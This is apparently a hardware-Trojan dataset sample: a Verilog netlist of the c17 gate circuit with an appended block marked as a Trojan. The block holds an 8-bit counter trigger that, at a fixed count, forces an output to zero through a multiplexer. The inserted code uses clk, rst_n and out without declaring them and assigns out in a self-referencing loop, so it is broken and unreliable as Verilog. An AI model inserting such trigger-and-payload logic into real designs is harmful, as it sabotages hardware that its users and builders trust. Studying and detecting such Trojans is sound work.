
// Generated by Cadence Genus(TM) Synthesis Solution 16.22-s033_1
// Generated on: Jan 17 2020 11:33:08 EST (Jan 17 2020 16:33:08 UTC)

// Verification Directory fv/c17 

module c17(N1, N2, N3, N6, N7, N22, N23);
  input N1, N2, N3, N6, N7;
  output N22, N23;
  wire N1, N2, N3, N6, N7;
  wire N22, N23;
  wire N10, N11, N16, N19;
  nand NAND2_1 (N10, N1, N3);
  nand NAND2_2 (N11, N3, N6);
  nand NAND2_3 (N16, N2, N11);
  nand NAND2_4 (N19, N11, N7);
  nand NAND2_5 (N22, N10, N16);
  nand NAND2_6 (N23, N16, N19);

// ---------------- Trojan: Counter-trigger + MUX payload ----------------
reg [7:0] troj_cnt_0;
always @(posedge clk or negedge rst_n) begin
    if (!rst_n) troj_cnt_0 <= 0;
    else        troj_cnt_0 <= troj_cnt_0 + 1'b1;
end

wire troj_trig_0 = (troj_cnt_0 == 8'hA7);

// Payload: MUX override when triggered
wire out_troj_0 = troj_trig_0 ? 1'b0 : out;
assign out = out_troj_0;

endmodule

